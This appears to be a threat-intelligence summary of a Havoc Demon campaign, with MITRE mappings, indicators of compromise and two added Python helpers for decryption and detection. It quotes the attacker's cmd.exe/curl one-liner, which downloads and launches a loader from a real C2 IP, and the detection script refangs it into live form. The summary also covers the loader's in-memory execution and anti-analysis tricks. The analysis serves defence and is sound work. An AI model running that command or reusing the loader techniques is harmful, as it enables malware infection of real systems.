Key points
- Malicious archive contained an ISO with a LNK that executed a cmd.exe command to fetch files via curl.
- Command downloaded Vipiska.doc (decoy) and OneDriveUpdater.exe (loader), then launched the loader and opened the decoy.
- OneDriveUpdater.exe is an unsigned C# PE32 loader that holds an encrypted payload and runs it in memory.
- Loader allocates and protects memory and creates a thread using VirtualAllocExNuma, VirtualProtect, and CreateThread to execute the payload.
- Anti-analysis checks included timing-based sleep verification and process-name validation before proceeding.
- The decrypted shellcode launched demon.x86.dll/demon.x64.dll, a Demon implant of the Havoc framework, which communicated with C2 servers (87.242.107[.]147:443, 87.242.107[.]224).
MITRE Techniques
- [T1059] Command-Line Interface: executed a cmd command to download and run files using curl and start ("cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe")
- [T1071] Application Layer Protocol: used HTTP/HTTPS to retrieve payloads and communicate with C2 ("POST" requests to C2 87.242.107[.]147:443)
- [T1055] Process Injection: implanted the Demon payload into svchost.exe for execution (x86: "C:\Windows\SysWOW64\svchost.exe", x64: "C:\Windows\System32\svchost.exe")
- [T1027] Obfuscated Files or Information: stored encrypted payloads that require a double XOR with 32-byte keys to decrypt ("double XOR with 32-byte keys")
Indicators of Compromise
- [IP addresses/C2] C2 servers used to host payloads and accept POSTs: 87.242.107[.]147, 87.242.107[.]224 (port 443)
- [File names] Malicious and decoy files used in the attack: OneDriveUpdater.exe (loader), Vipiska.doc / Medical.doc (decoys), demon.x86.dll / demon.x64.dll (implant)
- [File hash] Sample loader SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569
- [Host header / impersonation] HTTP Host header used to masquerade traffic: Host: microsoftonline[.]com
Opening the LNK triggered a single cmd.exe command that used curl to fetch a decoy document (saved as C:\Users\Public\Documents\Vipiska.doc) and a loader executable (saved as C:\Users\Public\Downloads\OneDriveUpdater.exe), then launched the loader and the decoy while terminating the cmd process. The loader is a C# PE32 binary bearing a OneDrive icon but lacking a signature; it contains encrypted x86 and x64 payload blobs that require a double XOR with 32-byte keys to decrypt.
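The "double XOR with 32-byte keys" step described above, written out as an added analysis helper. This is not code from the report or from the loader itself: the two keys and the encrypted blob below are constructed placeholders, because the page does not publish the real key material, and the PE sanity check is a generic one an analyst would run on any recovered blob.

```python
"""Added analysis helper (not from the original report): reverses a
"double XOR with 32-byte keys" layering of the kind the summary attributes
to the OneDriveUpdater.exe loader. SAMPLE_KEY1, SAMPLE_KEY2 and the blob are
constructed placeholders; the real keys and payloads are not on the page."""


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key cyclically."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def double_xor_decrypt(blob: bytes, key1: bytes, key2: bytes) -> bytes:
    """Peel off both 32-byte XOR layers. XOR is its own inverse, so the same
    call encrypts and decrypts, and the order of the two keys is irrelevant."""
    if len(key1) != 32 or len(key2) != 32:
        raise ValueError("expected two 32-byte keys")
    return xor_with_key(xor_with_key(blob, key1), key2)


def combined_key(key1: bytes, key2: bytes) -> bytes:
    """Two same-length XOR layers collapse into one key, K = key1 XOR key2.
    That lets a single-pass tool (a CyberChef recipe, a YARA xor modifier
    search) handle the blob without modelling the second layer."""
    if len(key1) != len(key2):
        raise ValueError("keys must have the same length to be combined")
    return xor_with_key(key1, key2)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on a decrypted blob: an embedded DLL starts with
    'MZ' and carries the 'PE\\0\\0' signature at the offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed sample material: two 32-byte keys and a minimal fake PE header,
# so the round trip has something recognisable to recover.
SAMPLE_KEY1 = bytes(range(32))
SAMPLE_KEY2 = bytes(range(0x40, 0x60))


def make_sample_plaintext() -> bytes:
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")   # e_lfanew points right after the DOS header
    hdr += b"PE\0\0" + bytes(20)                      # PE signature plus a stub of COFF header bytes
    return bytes(hdr)


SAMPLE_PLAINTEXT = make_sample_plaintext()
# Encryption is the same operation as decryption, so this builds the "blob".
SAMPLE_BLOB = double_xor_decrypt(SAMPLE_PLAINTEXT, SAMPLE_KEY1, SAMPLE_KEY2)


if __name__ == "__main__":
    recovered = double_xor_decrypt(SAMPLE_BLOB, SAMPLE_KEY1, SAMPLE_KEY2)
    print("blob looks like PE before decryption:", looks_like_pe(SAMPLE_BLOB))
    print("recovered PE header:", looks_like_pe(recovered))
    single = xor_with_key(SAMPLE_BLOB, combined_key(SAMPLE_KEY1, SAMPLE_KEY2))
    print("single combined key gives same result:", single == recovered)
```

The practical takeaway for triage is the `combined_key` collapse: once both keys are pulled from the loader, the "double" scheme is no stronger than one 32-byte repeating XOR, and `looks_like_pe` is the quick stop condition when brute-forcing or confirming a key guess.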
Once running, the loader allocates executable memory and launches the payload in-process: it calls VirtualAllocExNuma to allocate memory, VirtualProtect to set execution permissions, and CreateThread to start execution. The loader includes anti-analysis checks that verify sleep duration (terminating if execution resumed too quickly) and confirm the running process name equals OneDriveUpdater before proceeding to decrypt and run the shellcode.
The decrypted shellcode loads a DLL named demon.x86.dll or demon.x64.dll, a Demon implant from the Havoc framework, and injects/executes it in svchost.exe (x86: C:\Windows\SysWOW64\svchost.exe, x64: C:\Windows\System32\svchost.exe). The implant communicates with C2 infrastructure over POST to 87.242.107[.]147:443 (and related server 87.242.107[.]224), using headers that include a Microsoft-sounding Host value (microsoftonline[.]com). Analysis of those servers revealed additional malicious files and another loader sample with the same PDB path and the SHA-256 noted above.
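Two of the observable behaviours on this page, the cmd.exe/curl one-liner from the T1059 entry and the POSTs to a bare IP carrying a Microsoft-looking Host header from the paragraph above, as an added detection sketch. This is not code from the report or any vendor product: the scoring functions, feature names and the sample telemetry are constructed for this example, the C2 addresses are the report's own IoCs refanged at load time, and the 203.0.113.0/24 addresses are a documentation range standing in for benign traffic. Seeing a Host header on port 443 assumes the proxy inspects TLS.

```python
"""Added detection sketch, not code from the original report. Scores constructed
sample telemetry for (1) a cmd.exe one-liner that curls files under
C:\\Users\\Public and starts them, and (2) POSTs to a raw IP whose Host header
names a Microsoft domain. Event formats and benign samples are made up."""
import re
from ipaddress import ip_address


def refang(text: str) -> str:
    """Turn the report's defanged IoCs (hxxp, [.]) back into the form seen in telemetry."""
    return text.replace("[.]", ".").replace("hxxp", "http")


# IoCs from the report, kept in their published (defanged) form as the source of truth.
KNOWN_C2 = {refang(ip) for ip in ("87.242.107[.]147", "87.242.107[.]224")}
MS_DOMAINS = ("microsoftonline.com", "microsoft.com", "live.com", "office.com")

# Features of the quoted T1059 one-liner; each is weak alone, together they are specific.
CURL_DOWNLOAD = re.compile(r"\bcurl\b[^&]*?\s-o\s", re.IGNORECASE)
PUBLIC_DROP = re.compile(r"c:\\users\\public\\", re.IGNORECASE)
START_HIDDEN = re.compile(r"\bstart\s+(?:/min\s+|/b\s+)+\S", re.IGNORECASE)
KILL_CMD = re.compile(r"\btaskkill\b.*?/im\s+cmd\.exe", re.IGNORECASE)


def score_process_cmdline(cmdline: str) -> list:
    """Return the matched features; three or more is worth an alert on its own."""
    hits = []
    if CURL_DOWNLOAD.search(cmdline):
        hits.append("curl_download")
    if PUBLIC_DROP.search(cmdline):
        hits.append("drop_in_users_public")
    if START_HIDDEN.search(cmdline):
        hits.append("start_hidden")
    if KILL_CMD.search(cmdline):
        hits.append("kills_parent_cmd")
    if "&&" in cmdline and len(hits) >= 2:
        hits.append("chained_commands")
    return hits


def _is_bare_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def score_http_event(method: str, destination: str, host_header: str) -> list:
    """destination is 'ip_or_name:port' as a proxy would log it (port optional)."""
    host, sep, port = destination.rpartition(":")
    if not sep:
        host, port = destination, ""
    reasons = []
    if host in KNOWN_C2:
        reasons.append("known_c2_ip")
    hdr = host_header.lower()
    if _is_bare_ip(host) and (hdr in MS_DOMAINS or hdr.endswith(tuple("." + d for d in MS_DOMAINS))):
        # A Microsoft name in the Host header while the socket goes to a raw IP:
        # weak on its own (CDNs do this), strong next to the other two signals.
        reasons.append("microsoft_host_header_on_bare_ip")
    if method.upper() == "POST" and _is_bare_ip(host) and port == "443":
        reasons.append("post_to_bare_ip_443")
    return reasons


# Constructed sample events; the first command line is the one quoted in the summary.
PROCESS_EVENTS = [
    refang("cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\\Users\\Public\\Documents\\Vipiska.doc "
           "&& curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\\Users\\Public\\Downloads\\OneDriveUpdater.exe "
           "&& start /min /B C:\\Users\\Public\\Downloads\\OneDriveUpdater.exe "
           "&& start /B C:\\Users\\Public\\Documents\\Vipiska.doc && taskkill /F /IM cmd.exe"),
    "cmd.exe /c curl https://updates.example.org/notes.txt -o C:\\Temp\\notes.txt",  # lone download
    "cmd.exe /c dir C:\\Users\\Public\\Documents",                                    # benign use of the folder
]
HTTP_EVENTS = [  # (method, destination, Host header)
    ("POST", "87.242.107.147:443", "microsoftonline.com"),
    ("GET", "login.microsoftonline.com:443", "login.microsoftonline.com"),
    ("POST", "203.0.113.10:443", "microsoftonline.com"),
    ("GET", "203.0.113.20:80", "203.0.113.20"),
]


def triage() -> dict:
    """Map each event that crosses the threshold to the reasons it fired."""
    out = {}
    for cmd in PROCESS_EVENTS:
        hits = score_process_cmdline(cmd)
        if len(hits) >= 3:
            out[cmd[:40]] = hits
    for method, dst, host in HTTP_EVENTS:
        reasons = score_http_event(method, dst, host)
        if len(reasons) >= 2:
            out[f"{method} {dst}"] = reasons
    return out


if __name__ == "__main__":
    for key, why in triage().items():
        print(key, "->", why)
```

The thresholds are deliberately conservative: a single curl download or a single write under C:\Users\Public is everyday noise, whereas the chained download-start-taskkill pattern and a POST to a raw IP with a borrowed Host header each fire several features at once. The same scoring can be pointed at Sysmon event ID 1 command lines and proxy access logs without changing the functions.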